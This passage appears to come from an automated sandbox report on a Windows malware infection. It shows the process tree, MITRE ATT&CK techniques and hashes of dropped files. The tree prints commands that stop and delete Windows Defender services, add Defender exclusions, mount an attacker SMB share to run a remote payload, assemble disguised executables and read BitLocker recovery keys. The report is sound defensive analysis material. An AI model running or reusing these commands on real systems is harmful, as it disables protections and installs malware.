        Launches sc.exe
        
        PID:3624
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        Modifies security service
        
        PID:4084
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:5840
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:6016
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:5884
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:1528
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:3556
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:5356
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:1340
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:5052
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:5100
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:4728
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:224
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:4308
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:3668
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:5244
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:4168
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:3444
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:5868
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:2796
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:5316
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:3812
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:2680
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:6040
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:4712
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:4504
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:5812
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:2268
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:4160
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:5256
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:1408
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:4476
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4824
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4056
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:4040
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:1136
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:2388
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:1924
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:4444
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:3008
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:3844
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:708
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:4272
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:4880
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:5188
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:2700
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:192
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:548
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:3148
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:3228
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:3036
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:4024
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:4452
      - C:\Users\Admin\AppData\Local\Temp\10450130101\RLPhvHg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450130101\RLPhvHg.exe"
        6⤵
        Executes dropped EXE
        
        PID:4388
      - C:\Users\Admin\AppData\Local\Temp\10450190101\7q8Wm5h.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450190101\7q8Wm5h.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2752
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1996
      - C:\Users\Admin\AppData\Local\Temp\10450200101\5829606600.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450200101\5829606600.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1524
      - C:\Users\Admin\AppData\Local\Temp\10450210101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450210101\7IIl2eE.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2636
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2844
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:4568
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        
        PID:4264
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:2352
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        
        PID:5892
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        8⤵
        
        PID:5144
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        8⤵
        
        PID:2008
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        8⤵
        
        PID:4520
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        8⤵
        
        PID:3744
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        8⤵
        
        PID:3400
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        8⤵
        
        PID:6136
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        
        PID:4256
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10450221121\pfJNmVW.cmd"
        6⤵
        
        PID:1660
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3316
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
        8⤵
        
        PID:4864
        
        C:\Windows\SysWOW64\net.exe
        
        net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
        9⤵
        
        PID:2576
        
        \??\UNC\aaso12.duckdns.org\shear\s.exe
        
        \\aaso12.duckdns.org\shear\s -fullinstall
        9⤵
        
        PID:5860
      - C:\Users\Admin\AppData\Local\Temp\10450230101\6f92211b94.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450230101\6f92211b94.exe"
        6⤵
        
        PID:5160
      - C:\Users\Admin\AppData\Local\Temp\10450240101\UZPt0hR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450240101\UZPt0hR.exe"
        6⤵
        
        PID:5476
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:5168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2872
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        
        PID:5812
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        
        PID:5212
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        
        PID:4340

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4056

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5540

C:\Drivers\pcidrv.exe
"C:\Drivers\pcidrv.exe"
1⤵
- Executes dropped EXE
PID:2432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBkAEQALQBNAFAAUAByAGUARgBlAFIARQBOAGMAZQAgAC0ARQB4AEMAbAB1AFMAaQBPAG4AUABhAHQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQwB1AHIAcgBlAG4AdABcAEYAcgBhAG0AZQB3AG8AcgBrAE4AYQBtAGUALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAGYAbwByAEMARQA7ACAAQQBEAGQALQBtAHAAcABSAGUAZgBFAHIARQBOAEMARQAgAC0ARQB4AEMATABVAHMAaQBvAG4AcAByAG8AQwBFAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEMAdQByAHIAZQBuAHQAXABGAHIAYQBtAGUAdwBvAHIAawBOAGEAbQBlAC4AZQB4AGUAIAAtAEYATwByAEMAZQA=
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5780

C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2132
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get C: -Type recoverypassword
  2⤵
  PID:5848
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get C: -Type recoverypassword
    3⤵
    PID:2940
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get F: -Type recoverypassword
  2⤵
  PID:2352
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get F: -Type recoverypassword
    3⤵
    PID:2608

C:\Users\Admin\AppData\Roaming\Current\FrameworkName.exe
"C:\Users\Admin\AppData\Roaming\Current\FrameworkName.exe"
1⤵
- Executes dropped EXE
PID:2316

C:\Drivers\pcidrv.exe
"C:\Drivers\pcidrv.exe"
1⤵
PID:4444

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
1⤵
PID:2852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:3820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:2796

C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
1⤵
PID:2068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Drivers\pcidrv.exe

Filesize
2.3MB

MD5
e5cb0425792ae07695337b5d36369dea

SHA1
d0b53a35d9959afc34e746faa7da663c4dc31d82

SHA256
975df998975749de47d11c12056c03f8e387f5eb7b0348937770a11158cf4382

SHA512
f1c3fa5ab23cc544fa485dff63c2ecd7c3ceb1904fb8ea3c7ab016dad7036a0bf1977acf79a871b22450c30b94da700455e9df4e602741467dbb5a6f37fa0795

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.db

Filesize
154KB

MD5
394d5170f6c2c640267e87a82e600991

SHA1
1705f9e61455e653dc41fc4473036921f0665ee8

SHA256
3533fcffd9dd2e30f23c82c7610b4a221c11b96224fe6f7886c3d8436f18eac4

SHA512
5ffc21d9464d875dd2e11cd504ffa3c8a1654aa1f8fd7c491a5e93e9a6ac8ae51b78fb657d3198cdbd2c5635f88679ecb0944ff5c7bd3409fd631979bd3a157c

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.db.tmp

Filesize
154KB

MD5
3c409dbcb38128f980e37677a92398c4

SHA1
0420823a69d8001ea667f8cf3cac237cf7e5304b

SHA256
14e794b6a23be4ea389e1f8d57a0f5c12db9d4d62f2fb9a8b79f463e67e79074

SHA512
bc3f9a1bb900cc76ec81730c803b4a3e89a8ecdb96e8b0d6364b121f1a553a526dd52cf77bfaf6be3a5588bd0446faea5bf26d94a0633497e1f058b8c66e6cba

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.exe

Filesize
3.3MB

MD5
91424f307b7f0e238aab1f06434a7dc4

SHA1
4fb5ec3082d3545a79e2ccbd4b624320cafd68f1

SHA256
cdc2aa09167bd32f9a01eb60414d0b8faaf8616b9a23a7fc1671bb6bc7f162a1

SHA512
6830052ce91c378e7e21c385fb9a522f57fa59d1082a460a26199dbcfa808b37abad741eb8bf7dfd746d522d37dc03ac9d1674fb429f988873eb6a53fde93f83

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
12bdf3bfbe10afc0b9b8a30fe850f3dc

SHA1
882017f1f6a343f271a6b2849b85b45ff1e70831

SHA256
757e90fd2cd589edaea349007bc83485bc9f8ce0099e3cf28ce12dd0d7aa558b

SHA512
2f0c33f86a95a7bd7410e149072c2ebb28850be6debbcde7b735f7c564abd9871cdd19fc549b6a0a1183c30b0e525bccae794aa91aef2e4aa270c41904fca14e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
d144588ba9c810fba49c5fbbf90c5a25

SHA1
4ce28c1894621ad971fa86bfa390237df54c80dc

SHA256
fe00eed1f514b29675bf8a6b1899ea2273e37a65240672c0773d6e0133e6bf1e

SHA512
377ee1db8bbb43a6786c11df7c6adb3ab51a62d310253949b82f8889768694a68d1b5945ce90134f582611a144d7cc310f3792da80bb7a4a29af364303b2b5b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
705385269a748dc8311dbf83a408bc94

SHA1
a5de8de0e8c492d49344b25fbd30313a249633fa

SHA256
d32723beba88d666e455d2407987ebda591da247ed7acf1c21d772ebee4c5d84

SHA512
433957873c869f0c9a07ffcb36197c170cbf945152b7aaefb296ce2fdf5911f6dc01f9abd33ba8ea91797a299b9ce71e78c8993c16ebf2e7919bb99fed49f4b8

Download Submit
C:\Users\Admin\AppData\Local\TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE

Filesize
1.8MB

MD5
7af101c47cc7ca3dc9d589a086f652c5

SHA1
12dd133916d3eb7d0717bb2b4b54f459204b0e3c

SHA256
aede7c76458edd68d86748891ded44ccefc5f35a2118ec3ed6c5fdaf4f715b17

SHA512
054220d8ff5748eaec9f4a73750d0fbfe0fa3ff61f376f2ff153e4a93367dfd75e1dbf60c8bdbb2c038f2c43183235203723570aaf242c6c3849713624915761

Download Submit
C:\Users\Admin\AppData\Local\Temp\10429610101\9sWdA2p.exe

Filesize
1.1MB

MD5
5adca22ead4505f76b50a154b584df03

SHA1
8c7325df64b83926d145f3d36900b415b8c0fa65

SHA256
aa7105a237dc64c8eb179f18d54641e5d7b9ab7da7bf71709a0d773f20154778

SHA512
6192d61e777c59aa80c236b2f3e961795b7ff9971327c4e3270803d356ecf38949811df680a372259a9638ccdb90fc1271fb844f1f35656d5b317c96081f396e

Download Submit
C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe

Filesize
3.1MB

MD5
31b30e8113ecec15e943dda8ef88781a

SHA1
a4a126fabb8846c031b3531411635f62f6e6abd7

SHA256
2f0ffc24180fa3b0b0489863860bff2afd3b87604aff55088d529a253fd73ef2

SHA512
55bb425bf612cd7750f85f78cacea7095109a561ddfa86c1ae88339a9deb7e6e930d5bee4dcaf7a206ae7d5b4144338c53be5c3fda94ecf1fbb3ce1a20329140

Download Submit
C:\Users\Admin\AppData\Local\Temp\10434400101\larBxd7.exe

Filesize
1.2MB

MD5
4641a0bec2101c82f575862f97be861c

SHA1
0dd1ee06cdb7ba9ef2aa1dc44c80f1bc2586d33b

SHA256
fc2ac17498bd7846607110e66426bdad0ab5302f5c7978dd72c20d99166292e1

SHA512
da87190b368b99feafdb6cfb2fe236c94741573f494ca1cc9127f3a34e9112e1c8d4bf794841b4f00d3f083bc8239226d7d6ffecb45eb02299ff4e03e6e3749a

Download Submit
C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe

Filesize
5.8MB

MD5
1dbdcaeaac26f7d34e872439997ee68d

SHA1
18c855f60fb83306f23634b10841655fb32a943b

SHA256
3142aecf9794be2f3894d3e1429d28f80918c5b41d516c9160e7cd3984a6f5a3

SHA512
aa447551d1d44d8b615a3d8a656c4085d024cc72fa9ead0b944c72dd7ff5bdab60fd7829440d9c2b4b2de364ca33d349e5716699e2cefd4835e35bbc7e421535

Download Submit
C:\Users\Admin\AppData\Local\Temp\10447480101\Mbxp0H9.exe

Filesize
4.1MB

MD5
84ea163232f5b470ee2ff0376db19cbc

SHA1
518a9092be2c92364ce1f2ea85c80bbed5da0bbe

SHA256
0328d4ba6d9351da17c443823167a0d76e3cb86e39f03af6b9a22076463f3ad6

SHA512
d8978878501305d46e90e3d7657177303de54ade525ffc647067ae2b63cf0cea6e1c65cbf5ad180dad11e5fd80d8f54c970f0c51357331a7b12670b03c50b624

Download Submit
C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe

Filesize
655KB

MD5
8be309beb3b1ad2b6b49b5a08702cfc2

SHA1
e579f46024d71ec258fa9851f2d79688cae24b3d

SHA256
5efeaaa2e83da921f6b52d0d82cc5038229b1306c8020072794e8c08fd1e51d7

SHA512
e1b21078da69b1a00475af10a3eddde0d5e797998280bdfeef371845ecc9098aa7344ed22595e0ae0cdc6a1d3342181648334a0e860f1fdb243b4b4577c8883a

Download Submit
C:\Users\Admin\AppData\Local\Temp\10449261121\pfJNmVW.cmd

Filesize
258B

MD5
883dc2eefa3767f2644fc6d3b3e55768

SHA1
21840ca7cb5b86db35879df43d6b2760e198ba5b

SHA256
ec5e54764cd4136d7b20c16f79275da7b303e845d061fe7bd8f01bc34b1c3e91

SHA512
e6951cc2c0c81b25e430d6fe13a17b5c8ec81b70ad3c345338ab16b7a4711c43991abccb3d259b1860ba17d14bad82f6a66ddcecf6b3e38ec326c931e3747989

Download Submit
C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe

Filesize
327KB

MD5
17b045d3037b19362f5710ef08a1c3a9

SHA1
b510e63483354299a982f8c8b8425e1611f60ad4

SHA256
ca1cf8c31abcbf6fa6d324098c97bea8452da24cfcf579a52a3d262c93a85557

SHA512
cd96011398083f83d0869df41acf62cc8ccb69ea92b5c83066098f4227aa60bf37af16c4b5118cb5497202c8f78ab4703c9d8acf61ca41f3512d882dd5f79ac0

Download Submit
C:\Users\Admin\AppData\Local\Temp\10450130101\RLPhvHg.exe

Filesize
7.3MB

MD5
4c1e985ca22c2a899aef2eb4c3995f93

SHA1
40f1dcbda8fca4792b9cf1303357c5a7ec4b2e99

SHA256
947c2577b0f00e15299cbe32bbc22b2652bb76fe3d9a56531cb5d0276218a36a

SHA512
c82e5301ab7ed347546f561ecf41135da5378bc5e999e1c296c69e8ede2d41c941617e80abcd2777688e9bcdfc635ba2ee55b938aaa6eba7d2d2ceffd84b46e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\10450200101\5829606600.exe

Filesize
1.7MB

MD5
a203d3780443dc732a03df37eb26af59

SHA1
cbe33fa45525d2d303a9ede5664ddb97c5fec0cd

SHA256
f61c8efcebfa32b872c6eaedc9f0a81361b4fa153813397b6bb02933df743173

SHA512
fad3df9869a13196e9a02fa533c73210f1ac8cc763af65cc6afa7a240c829dbf637732d1c3ec90154ec3db79280c1d76853ad343ce73e18dc0308f34d5e426c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\10450210101\7IIl2eE.exe

Filesize
1.2MB

MD5
7d842fd43659b1a8507b2555770fb23e

SHA1
3ae9e31388cbc02d4b68a264bbfaa6f98dd0c328

SHA256
66b181b9b35cbbdff3b8d16ca3c04e0ab34d16f5ebc55a9a8b476a1feded970a

SHA512
d7e0a845a1a4e02f0e0e9cf13aa8d0014587ebef1d9f3b16f7d3d9f3dc5cdc2a17aa969af81b5dc4f140b2d540820d39317b604785019f1cbfa50d785970493b

Download Submit
C:\Users\Admin\AppData\Local\Temp\10450230101\6f92211b94.exe

Filesize
2.1MB

MD5
b49297c004aed2554e31776ff6012f26

SHA1
0c7e0dca229fe3d2826a289567bcdfb6818b4940

SHA256
0fc4511813a35f68fd57761052b7e1e1774919b643ea4fd9df5cd05c339abf1d

SHA512
